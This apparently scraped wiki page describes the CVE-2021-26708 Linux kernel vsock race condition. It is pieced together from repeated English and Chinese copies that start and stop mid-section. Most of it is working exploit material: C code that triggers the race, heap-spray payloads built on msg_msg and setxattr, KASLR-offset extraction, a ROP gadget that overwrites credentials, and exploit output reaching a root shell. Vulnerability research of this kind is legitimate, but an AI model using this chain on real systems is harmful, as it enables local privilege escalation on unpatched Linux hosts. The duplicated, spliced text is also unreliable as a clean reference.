    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};

The front is the message header, and the back is the message data. If the struct msgbuf in the user space has a 16-byte mtext, the corresponding msg_msg will be created in the kmalloc-64 block cache. A 4-byte write-after-free will destroy the void *security pointer at offset 40. The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc(). When msg_msg is received, it will be released by security_msg_msg_free(). Therefore, by destroying the first half of the security pointer, arbitrary free can be obtained.

==Kernel Information Leak==

Here is used [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D %87%E6%BC%8F%E6%B4%9E CVE-2019-18683] the same technique. The second connect() of the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL, making vsock_stream_setsockopt() Calling virtio_transport_send_pkt_info() after the memory crash, a kernel warning appears:

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
  vsock_update_buffer_size+0x5f/0x70 [vsock]
  vsock_stream_setsockopt+0x128/0x270 [vsock]
...

Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.

==Achieve arbitrary reading==

===From arbitrary free to use-after-free===

Release an object from the leaked kernel address
Perform heap spray and cover the object with controlled data
Use damaged objects for privilege escalation
The System V message implemented by the kernel has a maximum limit of DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg)). If you send a larger message, the remaining messages will be saved in the list of message segments. The msg_msg contains struct msg_msgseg *next to point to the first segment, and size_t m_ts is used to store the size. When performing an overwrite operation, you can put the controlled value in msg_msg.m_ts and msg_msg.next:

![](/static/pwnwiki/img/T01a51dfe7a996e854c.png )

Payload:

    #define PAYLOAD_SZ 40 
    void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
    {
        struct msg_msg *msg_ptr;

        xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

        /* Don't touch the second part to avoid breaking page fault delivery */
        memset(spray_data, 0xa5, PAGE_SIZE * 4);

        printf("[+] adapt the msg_msg spraying payload:\n");
        msg_ptr = (struct msg_msg *)xattr_addr;
        msg_ptr->m_type = 0x1337;
        msg_ptr->m_ts = ARB_READ_SZ;
        msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
        printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
               msg_ptr,
               msg_ptr->m_type, &(msg_ptr->m_type),
               msg_ptr->m_ts, &(msg_ptr->m_ts),
               msg_ptr->next, &(msg_ptr->next));
    }

But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:

MSG_COPY (since Linux 3.8)
        Nondestructively fetch a copy of the message at the ordinal position  in  the  queue
        specified by msgtyp (messages are considered to be numbered starting at 0).

This flag causes the kernel to copy the message data to the user space without deleting it from the message queue. If the kernel has CONFIG_CHECKPOINT_RESTORE=y, then MSG is available and applicable in Fedora Server.

===任意讀的步驟===

![](/static/pwnwiki/img/T01a2a2d47c9494c4a5.png )

![](/static/pwnwiki/img/T0140baae964febb059.png )

通過從存儲被覆蓋的 msg_msg的消息隊列中接收消息，將vsock_sock內核對象的內容讀到用戶空間：

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
                IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

==尋找攻擊目標==

下面是該漏洞如何從內存中提取這些指針:

#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET    840
#define OWNER_CRED_RD_LOCATION    (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET    688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET) 
/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 *   function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu 
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

    sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
            sk_memcg, SK_MEMCG_RD_LOCATION);

    owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
            owner_cred, OWNER_CRED_RD_LOCATION);

    sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
            sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

    kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);

==在 sk_buff 上實現 Use-after-free==

我構建了以下步驟：

1.使用socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)創建一個客戶端套接字和32個服務器套接字

2.在用戶空間中準備一個2800字節的緩衝區，並用0x42對其memset()

3.用sendto()將這個緩衝區從客戶端套接字發送到每個服務器套接字，用於在kmalloc-4k中創建sk_buff對象。在每個可用的CPU上使用`sched_setaffinity()

4.對vsock_sock執行任意讀取過程

5.計算可能的sk_buff內核地址為sk_memcg加4096(kmalloc-4k的下一個元素)

6.對這個可能的sk_buff地址執行任意讀

7.如果在網絡數據的位置找到0x42424242424242lu，則找到真正的sk_buff，進入步驟8。否則，在可能的sk_buff地址上加4096，轉到步驟6

8.sk_buff上執行32個pthreads的setxattr()&userfaultfd()堆噴射，並把它們掛在pthread_barrier上

9.對sk_buff內核地址進行任意釋放

10.調用pthread_barrier_wait()，執行32個setxattr()覆蓋skb_shared_info的堆噴pthreads

11.使用recv()接收服務器套接字的網絡消息。

==通過skb_shared_info 進行任意寫==

以下是覆蓋sk_buff對象的有效payload：

#define SKB_SIZE        4096
#define SKB_SHINFO_OFFSET    3776
#define MY_UINFO_OFFSET        256
#define SKBTX_DEV_ZEROCOPY    (1 << 3) 
void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

![](/static/pwnwiki/img/T0185ccbf9f025c74da.png )

下面講講destructor_arg 回調:

 /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */

由於在vmlinuz-5.10.11-200.fc33.x86_64中找不到一個能滿足我需求的gadget，所以我自己進行了研究構造。

[a13x@localhost ~]$ ./vsock_pwn

=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================

[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready

[+] stage I: collect good msg_msg locations
[+] go racing, show wins: 
    save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
    save msg_msg ffff9125c25a4640 in msq 12 in slot 1
    save msg_msg ffff9125c25a4780 in msq 22 in slot 2
    save msg_msg ffff9125c3668a40 in msq 78 in slot 3

[+] stage II: arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4d00
    kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins: 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000

[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4640
    kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11 
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb

[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
    start at 0x7f0d91120004
    skb_shared_info at 0x7f0d91120ec4
    tx_flags 0x8
    destructor_arg 0xffff9125c42fa100
    callback 0xffffffffab64f6d4
    desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30 

[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

==視頻==

https://www.youtube.com/watch?v=EC8PFOYOUgU

==參考==

https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==

vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.

==Memory corruption==

  setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                &size, sizeof(unsigned long));

The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:

struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:

     if (vsk->transport) {
            if (vsk->transport == new_transport)
                return 0;

            /* transport->release() must be called with sock lock acquired.
             * This path can only be taken during vsock_stream_connect(),
             * where we have already held the sock lock.
             * In the other cases, this function is called on a new socket
             * which is not assigned to any transport.
             */
            vsk->transport->release(vsk);
            vsock_deassign_transport(vsk);
        }

When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:

void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}

==Fuzzing==

The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:

 if (val != vsk->buffer_size &&
      transport && transport->notify_buffer_size)
        transport->notify_buffer_size(vsk, &val);

    vsk->buffer_size = val;

/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov .
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

int thread_sync(long lag_nsec)
{
	int ret = -1;
	struct timespec ts0;
	struct timespec ts;
	long delta_nsec = 0;

	ret = pthread_barrier_wait(&barrier);
	if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
		perror("[-] pthread_barrier_wait");
		return EXIT_FAILURE;
	}

	ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
	if (ret != 0) {
		perror("[-] clock_gettime");
		return EXIT_FAILURE;
	}

	while (delta_nsec < lag_nsec) {
		ret = clock_gettime(CLOCK_MONOTONIC, &ts);
		if (ret != 0) {
			perror("[-] clock_gettime");
			return EXIT_FAILURE;
		}

		delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
						ts.tv_nsec - ts0.tv_nsec;
	}

	return EXIT_SUCCESS;
}

void *th_connect(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
	};

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	addr.svm_cid = VMADDR_CID_LOCAL;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	addr.svm_cid = VMADDR_CID_HYPERVISOR;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	return NULL;
}

void *th_setsockopt(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct timespec tp;
	unsigned long size = 0;

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	clock_gettime(CLOCK_MONOTONIC, &tp);
	size = tp.tv_nsec;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
						&size, sizeof(unsigned long));

	return NULL;
}

int main(void)
{
	int ret = -1;
	unsigned long size = 0;
	long loop = 0;
	pthread_t th[2] = { 0 };

	vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (vsock == -1)
		err_exit("[-] open vsock");

	printf("[+] AF_VSOCK socket is opened\n");

	size = 1;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
						&size, sizeof(unsigned long));
	size = 0xfffffffffffffffdlu;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
						&size, sizeof(unsigned long));

	ret = pthread_barrier_init(&barrier, NULL, 2);
	if (ret != 0)
		err_exit("[-] pthread_barrier_init");

	for (loop = 0; loop < 30000; loop++) {
		long tmo1 = 0;
		long tmo2 = loop % MAX_RACE_LAG_USEC;

		printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

		ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
		if (ret != 0)
			err_exit("[-] pthread_create #0");

		ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
		if (ret != 0)
			err_exit("[-] pthread_create #1");

		ret = pthread_join(th[0], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #0");

		ret = pthread_join(th[1], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #1");

		if (tfail) {
			printf("[-] some thread got troubles\n");
			exit(EXIT_FAILURE);
		}
	}

	ret = close(vsock);
	if (ret)
		perror("[-] close");

	printf("[+] now see your warnings in the kernel log\n");
	return 0;
}

== The power of four bytes ==

Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.

struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};

==Kernel Information Leak==

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
  vsock_update_buffer_size+0x5f/0x70 [vsock]
  vsock_stream_setsockopt+0x128/0x270 [vsock]
...

Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.

==Achieve arbitrary reading==

===From arbitrary free to use-after-free===

![](/static/pwnwiki/img/T01a51dfe7a996e854c.png )

Payload:

    #define PAYLOAD_SZ 40 
    void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
    {
        struct msg_msg *msg_ptr;

        xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

        /* Don't touch the second part to avoid breaking page fault delivery */
        memset(spray_data, 0xa5, PAGE_SIZE * 4);

        printf("[+] adapt the msg_msg spraying payload:\n");
        msg_ptr = (struct msg_msg *)xattr_addr;
        msg_ptr->m_type = 0x1337;
        msg_ptr->m_ts = ARB_READ_SZ;
        msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
        printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
               msg_ptr,
               msg_ptr->m_type, &(msg_ptr->m_type),
               msg_ptr->m_ts, &(msg_ptr->m_ts),
               msg_ptr->next, &(msg_ptr->next));
    }

But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:

MSG_COPY (since Linux 3.8)
        Nondestructively fetch a copy of the message at the ordinal position  in  the  queue
        specified by msgtyp (messages are considered to be numbered starting at 0).

===Steps of arbitrary reading===

Ready to work:
Use sched_getaffinity() and CPU_COUNT() to calculate the number of available CPUs (at least two are required for this vulnerability);
Open /dev/kmsg for analysis;
mmap() configures userfaultfd() in the spray_data memory area as the last part;
Start a separate pthread to handle userfaultfd() events;
Start 127 threads for setxattr()&userfaultfd() heap spray on msg_msg, and hang them on thread_barrier;
Get the kernel address of the original msg_msg:
Conditional competition on virtual sockets;
After the second connect(), wait 35 microseconds in the busy loop;
Call msgsnd() to create a separate message queue; after memory corruption, the msg_msg object is placed in the virtio_vsock_sock position;
Parse the kernel log and save the kernel address of msg_msg from the kernel warning (RCX register);
At the same time, save the kernel address of vsock_sock from the RBX register;
Use the damaged msg_msg to perform arbitrary release of the original msg_msg:
Use 4 bytes of the original msg_msg address as SO_VM_SOCKETS_BUFFER_SIZE to achieve memory corruption;
Conditional competition on virtual sockets;
Call msgsnd() immediately after the second connect(); msg_msg is placed in the position of virtio_vsock_sock to achieve destruction;
The security pointer of the now destroyed msg_msg stores the address of the original msg_msg (from step 2);

![](/static/pwnwiki/img/T01a2a2d47c9494c4a5.png )

If the msg_msg.security memory corruption from the setsockopt() thread occurs during the processing of msgsnd(), the SELinux permission check fails;
In this case, msgsnd() returns -1, and the damaged msg_msg is destroyed; releasing msg_msg.security can release the original msg_msg;
Overwrite the original msg_msg with a controllable payload:
After msgsnd() fails, the vulnerability will call pthread_barrier_wait() and call 127 pthreads for heap spraying;
These pthreads execute the payload of setxattr();
The original msg_msg is overwritten by controllable data, and the msg_msg.next pointer stores the address of the vsock_sock object;

![](/static/pwnwiki/img/T0140baae964febb059.png )

Read the contents of the vsock_sock kernel object to user space by receiving messages from the message queue storing the overwritten msg_msg:

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
                IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

==Find the target of attack==

Here are the points I found:
1. Dedicated block cache, such as PINGv6 and sock_inode_cache have many pointers to objects
2. The struct mem_cgroup *sk_memcg pointer is at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in kmalloc-4k block cache.
3. The const struct cred *owner pointer is at offset 840 of vsock_sock.sk, and stores the address of the credential that can be overwritten for permission escalation.
4. The void (*sk_write_space)(struct sock *) function pointer is at offset 688 of vsock_sock.sk and is set to the address of the sock_def_write_space() kernel function. It can be used to calculate the KASLR offset.

Here is how the vulnerability extracts these pointers from memory:

#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET    840
#define OWNER_CRED_RD_LOCATION    (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET    688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET) 
/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 *   function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu 
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

    sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
            sk_memcg, SK_MEMCG_RD_LOCATION);

    owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
            owner_cred, OWNER_CRED_RD_LOCATION);

    sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
            sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

    kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);

==Implement Use-after-free on sk_buff==

The network-related buffer in the Linux kernel is represented by struct sk_buff. There are skb_shared_info and destructor_arg in this object, which can be used for control flow hijacking. Network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. Therefore, creating a 2800-byte network packet in user space will cause skb_shared_info to be allocated to the kmalloc-4k block cache, as is the mem_cgroup object.

I built the following steps:

1. Use sockets (AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create a client socket and 32 server sockets

2. Prepare a 2800-byte buffer in user space and use 0x42 to memset()

3. Use sendto() to send this buffer from the client socket to each server socket, which is used to create the sk_buff object in kmalloc-4k. Use `sched_setaffinity() on every available CPU

4. Perform arbitrary reading process on vsock_sock

5. Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)

6. Perform arbitrary reads on this possible sk_buff address

7. If you find 0x42424242424242lu in the location of the network data, find the real sk_buff, and go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6

8. Execute the setxattr()&userfaultfd() heap spray of 32 pthreads on sk_buff and hang them on pthread_barrier

9. Arbitrarily release the sk_buff kernel address

10. Call pthread_barrier_wait(), execute 32 setxattr() to cover the heap spray pthreads of skb_shared_info

11. Use recv() to receive network messages from the server socket.

==Writing freely through skb_shared_info==

The following is a valid payload that overwrites the sk_buff object:

#define SKB_SIZE        4096
#define SKB_SHINFO_OFFSET    3776
#define MY_UINFO_OFFSET        256
#define SKBTX_DEV_ZEROCOPY    (1 << 3) 
void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

skb_shared_info resides in the injection data, exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. Because the kernel address of the attacked sk_buff is known, a fake ubuf_info can be created at MY_UINFO_OFFSET in the network buffer. The following is the layout of a valid payload:

![](/static/pwnwiki/img/T0185ccbf9f025c74da.png )

Let's talk about the destructor_arg callback:

 /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */

Since I couldn't find a gadget that can meet my needs in vmlinuz-5.10.11-200.fc33.x86_64, I researched and constructed it myself.

The callback function pointer stores the address of a ROP gadget, RDI stores the first parameter of the callback function, which is the address of ubuf_info itself, and RDI + 8 points to ubuf_info.desc. gadget moves ubuf_info.desc to RDX. Now RDX contains the effective user ID and group ID address minus one byte. This byte is very important: when the gadget writes message 1 from RSI to the memory pointed to by RDX, the effective uid and gid will be overwritten with zero. Repeat the same process until the privileges are upgraded to root. The output flow of the whole process is as follows:

[a13x@localhost ~]$ ./vsock_pwn

=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================

[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready

[+] stage I: collect good msg_msg locations
[+] go racing, show wins: 
    save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
    save msg_msg ffff9125c25a4640 in msq 12 in slot 1
    save msg_msg ffff9125c25a4780 in msq 22 in slot 2
    save msg_msg ffff9125c3668a40 in msq 78 in slot 3

[+] stage II: arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4d00
    kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins: 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000

[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4640
    kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11 
